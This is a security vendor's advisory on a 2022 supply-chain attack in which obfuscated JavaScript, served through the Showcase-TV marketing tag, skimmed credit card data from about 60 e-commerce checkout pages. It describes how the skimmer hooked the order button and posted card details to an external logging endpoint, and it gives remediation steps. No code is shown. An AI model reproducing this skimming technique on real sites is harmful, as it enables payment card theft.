How a Compromised Martech Vendor Stole Credit Card Data from Nearly 60 Websites

• Vault JS identified malicious JavaScript on nearly 60 websites running Showcase-TV marketing tools that was actively scraping credit card data from checkout pages. The code attached to order confirmation button clicks, captured card numbers, expiration dates, and security codes, then posted the data to an external endpoint.
• The attack exploited a trusted third-party vendor relationship, not a vulnerability in the host sites themselves. The malicious code was delivered through JavaScript hosted at navicast.jp, a legitimate marketing technology domain, making it invisible to standard security tools that whitelist known vendor scripts.
• The malicious code was obfuscated to avoid detection and ran for at least two days before being identified. Vault JS believes the vulnerability existed on at least July 25 and 26, 2022. The code has since been removed, but organizations using third-party marketing tags should audit their sites for similar injection patterns.

UPDATE: Vault JS believes that the malicious code has been removed. It appears the vulnerability existed at least on July 25 and July 26th (in Pacific time zone).

Since July 25, 2022 Vault JS experts have identified suspicious code on nearly 60 different websites that are running web marketing tools from Showcase-TV. These sites are currently not being supported by Vault JS and may be leaking customer data right now. If you are using Showcase-TV, you should consider removing this code temporarily until this is resolved.

The issue comes from JavaScript hosted @navicast.jp. The request to r2.sb/api returns JavaScript code that behaves suspiciously, performing the following actions:

1. The code attaches to an order confirmation button click event
2. When the button is clicked, the code scrapes credit card information from the page
3. The code then posts that information to an endpoint at r2.sb/log_api/log

The code is obfuscated to make it more difficult to uncover this activity. Below, we’ve deobfuscated the portion of the code which concerns our team. As you see, the code gathers the credit card number, expiration date month and year, and security code. It then logs this data. This example is from the payments page of the e-commerce website www.chojyu.com. In addition, our team believes the sites www.ekenkoshop.jp, fig-viper.jp, and scores of other sites have also been compromised.

If your site runs Showcase-TV or any third-party marketing tools hosted on the navicast.jp domain, take the following steps immediately:

1. Remove or disable the Showcase-TV tag temporarily. Until the vendor has confirmed the vulnerability is fully remediated and can provide documentation of the fix, the safest course is to pull the code from your site entirely.
2. Audit your checkout and payment pages for unauthorized scripts. Review all JavaScript executing on pages where customers enter credit card data. Look for obfuscated code, unfamiliar external endpoints, or scripts attaching to form submission button click events.
3. Check server logs for outbound requests to r2.sb. If your site was compromised, credit card data may have been posted to r2.sb/log_api/log. Identifying whether these requests occurred and over what timeframe will help determine the scope of exposure.
4. Notify affected customers and your payment processor. If you confirm that card data was exfiltrated, initiate your breach notification process. PCI DSS requirements and applicable state or national breach notification laws will dictate specific timelines and obligations.

Implement continuous monitoring of third-party code changes. This attack succeeded because malicious code was delivered through a trusted vendor domain. Point-in-time audits would not have caught it. Ongoing monitoring of all JavaScript executing on your site, particularly on payment pages, is the only reliable way to detect this class of supply-chain compromise.

Please follow our LinkedIn page for ongoing updates. In addition, you can request a free analysis of your own site to uncover any suspicious code or data leaks that might be happening right now through your third party tags.